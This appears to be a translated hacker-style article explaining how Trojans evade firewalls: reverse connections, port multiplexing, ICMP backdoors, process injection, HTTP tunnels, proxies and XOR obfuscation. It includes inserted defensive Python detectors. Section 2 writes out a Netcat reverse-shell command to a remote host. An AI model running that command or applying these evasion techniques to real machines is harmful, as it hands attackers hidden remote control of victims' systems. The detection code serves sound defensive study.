How does the Trojan cross your firewall?

Source: Internet
Author: User
Tags: insert, access, firewall

The network is not a peaceful place: everyone on the Internet puts up a firewall to protect against attacks. Doesn't that pose a serious challenge to the survival of our Trojans?

Natural selection, survival of the fittest, hmm... If you want to survive, you have to get through the wall! Ways to bypass a firewall:

1. No firewall at all (a local listener is allowed on basically any port). No firewall? (Isn't that stating the obvious?)

Machines like this are easy to deal with; basically any horse works. The typical representative is Radmin (which is in fact not a horse at all; so many people used it that it became one, innocent as it is).

RDP, 3389/tcp (Remote Desktop; not a horse either, but if you don't use it, who will?)

2. Port filtering (only specific ports may be connected to from outside; that is, only a SYN connection request from outside to one of those ports is accepted, so the three-way handshake completes and the connection is established. Otherwise the firewall discards the packet, the handshake cannot complete and no connection is established. In other words, the Trojan cannot open a listening port.)

But there is a way to outsmart it:

You won't let me connect to you, so I'll let you connect to me instead. Thus reverse-connection ("port bounce") technology was born (the typical firewall does not intercept SYN connection requests originating from the local host).

Use the tool Netcat to punch through this kind of firewall:

nc -e cmd.exe <remote IP> <remote listening port>

Later, port-multiplexing technology appeared as well: reusing ports the firewall already leaves open, such as 80, 21 and 445.

Typical backdoors of this kind are Hkdoor and ntrootkit (written by the Chinese author Yyt_hac).

There is also communication over protocols that have no ports at all, for example ICMP packets (ping uses the ICMP protocol's Echo Request and Echo Reply to probe whether a host is alive).

A typical example is Pingdoor (because ping uses ICMP packets, no port is opened and port filtering is helpless against it; but ICMP has no error control, so this backdoor's transmission characteristics are not ideal unless you add error control yourself).
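From the defender's side, the weak point of an ICMP backdoor is that a real ping has a fixed, predictable payload. The following is an added example (not code from the original article or from Pingdoor) that flags echo traffic whose payload is non-standard or whose reply does not echo the request; the stock-ping patterns and the packet records are assumptions constructed for the demo.

```python
"""Flag ICMP echo traffic that does not look like an ordinary ping.

Added example, not code from the original article. A stock ping sends a fixed,
predictable payload and the reply echoes it byte for byte; an ICMP backdoor
like the article's Pingdoor must carry its own data there instead, so the
payload gives it away even though no port is involved. Records are constructed.
"""

ECHO_REPLY, ECHO_REQUEST = 0, 8

# Default ping payloads (assumption: monitored hosts use stock tools).
# Windows sends 32 bytes 'a'..'w','a'..'i'; Linux iputils fills byte i with
# value i and overwrites the first bytes with a timeval, so only the tail
# from offset 16 of its 56-byte payload is stable.
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"
LINUX_PING_TAIL = bytes(range(16, 56))


def looks_like_ping(payload):
    """True if the payload matches a stock ping tool's default pattern."""
    if payload == WINDOWS_PING:
        return True
    return len(payload) == 56 and payload[16:] == LINUX_PING_TAIL


def analyse(records):
    """Return (reason, record) findings for echo traffic that misbehaves."""
    findings, requests = [], {}  # requests: (src, dst, id, seq) -> payload
    for r in records:
        if r["type"] == ECHO_REQUEST:
            requests[(r["src"], r["dst"], r["id"], r["seq"])] = r["payload"]
            if not looks_like_ping(r["payload"]):
                findings.append(("non-standard echo payload", r))
        elif r["type"] == ECHO_REPLY:
            # The matching request flowed in the opposite direction.
            req = requests.get((r["dst"], r["src"], r["id"], r["seq"]))
            if req is not None and req != r["payload"]:
                findings.append(("reply payload differs from request", r))
    return findings


def rec(src, dst, typ, ident, seq, payload):
    return {"src": src, "dst": dst, "type": typ, "id": ident, "seq": seq, "payload": payload}

# Constructed sample: one normal Windows ping exchange and one exchange in
# which both directions carry their own data instead of the ping pattern.
SAMPLE = [
    rec("10.0.0.5", "10.0.0.1", ECHO_REQUEST, 1, 1, WINDOWS_PING),
    rec("10.0.0.1", "10.0.0.5", ECHO_REPLY, 1, 1, WINDOWS_PING),
    rec("10.0.0.7", "203.0.113.9", ECHO_REQUEST, 2, 1, b"\x01\x00tunnelled-data"),
    rec("203.0.113.9", "10.0.0.7", ECHO_REPLY, 2, 1, b"\x01\x00tunnelled-answer"),
]
```

Running analyse(SAMPLE) reports the third record for its payload and the fourth because its reply does not echo the request, while the genuine ping pair passes silently.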

Even more impressive is to set the TCP/IP protocols aside altogether and have the Trojan communicate over its own custom protocol. How is a firewall going to stop me then? Haha.

A typical example is ntrootkit, which uses a custom protocol.

3. Application filtering (only specific programs are allowed to access the network).

The Trojan will not accept this either; if it cannot access the network itself, it has to piggyback on something that can:

Process injection ("insertion") technology was born. Firewalls usually allow iexplore.exe, explorer.exe, svchost.exe, services.exe and similar programs to access the network, so the Trojan sets its sights on these processes. Inject... inject and inject again.

Today's remote-control tools generally inject into a process, for two reasons: first, stealth (no process of their own), and second, getting through the wall. Typical examples are Bits.dll (which replaces the system BITS service and is loaded into svchost.exe) and Gray Pigeon / PcShare (which by default inject into the iexplore.exe browser process).

4. Protocol screening.

(For example, only the HTTP protocol is allowed through on port 80, so a port-multiplexing backdoor that does not speak HTTP is, unfortunately, blocked by the firewall.) :-)

What to do? Sneak through by digging tunnels: HTTP-tunnel. The Trojan's traffic is encapsulated in HTTP datagrams for transmission.

PcShare uses this technique (a bidirectional HTTP tunnel for transport).
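The protocol screening described in section 4, and the port multiplexing of section 2 that it answers, can be shown in code. The following is an added example, not code from the original article or from any firewall product: it checks that a payload on ports 80, 21 and 445 actually looks like HTTP, FTP or SMB, and adds a simple heuristic for HTTP tunnels; the signatures and sample payloads are assumptions constructed for the demo.

```python
"""Protocol screening for ports a firewall leaves open.

Added example, not code from the original article. Section 4 describes a
firewall that lets port 80 through only when the payload really is HTTP; this
applies that idea to the ports the article names as multiplexing targets
(80, 21, 445) and adds a heuristic for HTTP tunnels. Samples are constructed.
"""
import re

HTTP_REQUEST = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS|CONNECT) \S+ HTTP/1\.[01]\r\n")
FTP_LINE = re.compile(rb"^([A-Z]{3,4}( [^\r\n]*)?|[1-5]\d\d[ -][^\r\n]*)\r\n")  # command or reply
SMB_MAGIC = (b"\xffSMB", b"\xfeSMB")  # SMB1 / SMB2 header after the 4-byte NetBIOS length


def is_text(data, threshold=0.9):
    """True if at least `threshold` of the bytes are printable ASCII or whitespace."""
    printable = sum(1 for b in data if 32 <= b < 127 or b in b"\r\n\t")
    return printable / len(data) >= threshold


def screen(port, payload):
    """Return 'allow', or a reason why the flow does not match the port's protocol."""
    if port == 21:
        return "allow" if FTP_LINE.match(payload) else "non-FTP data on port 21"
    if port == 445:
        return "allow" if payload[4:8] in SMB_MAGIC else "non-SMB data on port 445"
    if port == 80:
        if not HTTP_REQUEST.match(payload):
            return "non-HTTP data on port 80"
        head, _, body = payload.partition(b"\r\n\r\n")
        headers = {k.lower(): v for k, _, v in
                   (line.partition(b": ") for line in head.split(b"\r\n")[1:])}
        if b"host" not in headers:
            return "HTTP/1.x request without Host header"
        # Tunnel heuristic: the envelope says text, but the body is binary.
        if body and headers.get(b"content-type", b"").startswith(b"text/") and not is_text(body):
            return "HTTP envelope carrying a binary body (possible tunnel)"
    return "allow"


# Constructed samples: (port, first bytes of the client payload).
SAMPLES = [
    (80, b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    (80, b"\x00\x2a\x17backdoor-hello"),
    (80, b"POST /up HTTP/1.1\r\nHost: www.example.com\r\nContent-Type: text/plain\r\n"
         b"Content-Length: 8\r\n\r\n\x8f\x00\x12\xfe\x01\x02\x03\x04"),
    (21, b"USER anonymous\r\n"),
    (445, b"\x00\x00\x00\x40\xfeSMB" + bytes(60)),
    (445, b"hello from port 445 backdoor\r\n"),
]
```

The binary-body check is only a heuristic: a tunnel that declares an octet-stream content type passes it, which is exactly why the article's section 6 moves on to content inspection.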

5. IP filtering is generally divided into three levels: local host, local area network and WAN. But the Trojan is no pushover; some Trojans have started to get smart:

For example, if it cannot connect to the hacker's host or to a relay ("springboard") host, it looks up the local proxy settings, such as IE's proxy configuration, and then goes out through the proxy!

One can imagine that peer-to-peer horses will soon become possible, so the difference between a Trojan and a botnet will become even smaller. Oh!

6. Many firewalls can now detect the transmission of sensitive information, such as user passwords, so anti-IDS and anti-automatic-analysis measures have become things a high-end Trojan must consider; in other words, protecting the security and secrecy of the hacker's control channel. The typical solution is encryption; the simplest way to cope with IDS detection is XOR encryption.
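XOR with a one-byte key hides strings from a naive signature match, but not from an inspector that expects it. The following is an added example (not code from the original article) of how a defender recovers such a key by trying all 256 candidates against known protocol markers; the marker list and the sample packets are assumptions constructed for the demo.

```python
"""Seeing through single-byte XOR on a control channel.

Added example, not code from the original article. The article names XOR as
the simplest way to hide a control channel from an IDS; with a one-byte key
the defender just tries all 256 keys and looks for protocol markers in the
result (the approach behind YARA's `xor` modifier). Traffic is constructed.
"""

# Markers a control channel is likely to contain (assumption for the demo; a
# real rule set carries signatures of the specific families being hunted).
MARKERS = (b"cmd.exe", b"HTTP/1.", b"password")


def xor_bytes(data, key):
    """XOR every byte with the same one-byte key (key 0 leaves data unchanged)."""
    return bytes(b ^ key for b in data)


def find_xor_key(blob, markers=MARKERS):
    """Return (key, marker) for the first key that exposes a marker, else None."""
    for key in range(256):
        plain = xor_bytes(blob, key)
        for marker in markers:
            if marker in plain:
                return key, marker
    return None


def scan_stream(packets, markers=MARKERS):
    """List (index, key, marker) for packets matching a marker plainly or under XOR."""
    findings = []
    for i, packet in enumerate(packets):
        hit = find_xor_key(packet, markers)
        if hit is not None:
            findings.append((i, *hit))
    return findings


# Constructed sample stream: plain HTTP (matches with key 0), an XOR-hidden
# command-channel packet, and a filler packet that matches nothing under any key.
PACKETS = [
    b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    xor_bytes(b"\x01\x10<placeholder> cmd.exe <placeholder>", 0x5A),
    bytes(range(16)),
]
```

Because every byte shares the same key, a single known substring anywhere in the packet is enough to recover it; the cost of the scan is 256 comparisons per packet, which is cheap enough to run on every flow.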

Of course, today's firewalls do not apply the above technologies in isolation; several of them are in use at the same time.

Likewise, Trojans that combine all of the above countermeasures are not rare.

The Trojan horse and the protective wall are always a pair of contradictions: they struggle against each other and develop through each other. Hehe.


